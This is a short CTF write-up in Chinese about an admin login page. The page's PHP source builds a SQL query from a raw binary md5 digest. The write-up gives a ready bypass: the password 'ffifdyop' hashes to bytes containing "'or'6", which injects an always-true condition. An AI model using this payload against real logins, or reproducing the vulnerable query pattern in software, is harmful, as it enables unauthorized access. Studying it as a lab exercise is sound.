<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<meta charset="UTF-8"> | |
<title>Document</title> | |
</head> | |
<body style="background-color: #999"> | |
<div style="position:relative;margin:0 auto;width:300px;height:200px;padding-top:100px;font-size:20px;"> | |
<form action="" method="post"> | |
<table> | |
<tr> | |
请用管理员密码进行登录~~ | |
</tr> | |
<tr> | |
<td>密码:</td><td><input type="text" name='password'></td> | |
</tr> | |
<tr> | |
<td><input type="submit" name='submit' style="margin-left:30px;"></td> | |
</tr> | |
</table> | |
</form> | |
密码错误! </div> | |
<!-- $password=$_POST['password']; | |
$sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; | |
$result=mysqli_query($link,$sql); | |
if(mysqli_num_rows($result)>0){ | |
echo 'flag is :'.$flag; | |
} | |
else{ | |
echo '密码错误!'; | |
} --> | |
</body> | |
</html> |
上面是源码,问题就在于什么样的密码md5()加密过后,函数会自动hex处理后包含'or'等字符串
$sql="select password from users where password=''or'<xxx>'"
提供一个现成字符串:
提供一个字符串:ffifdyop
md5后,276f722736c95d99e921722cf9ed621c
再转成字符串: 'or'6<其他字符>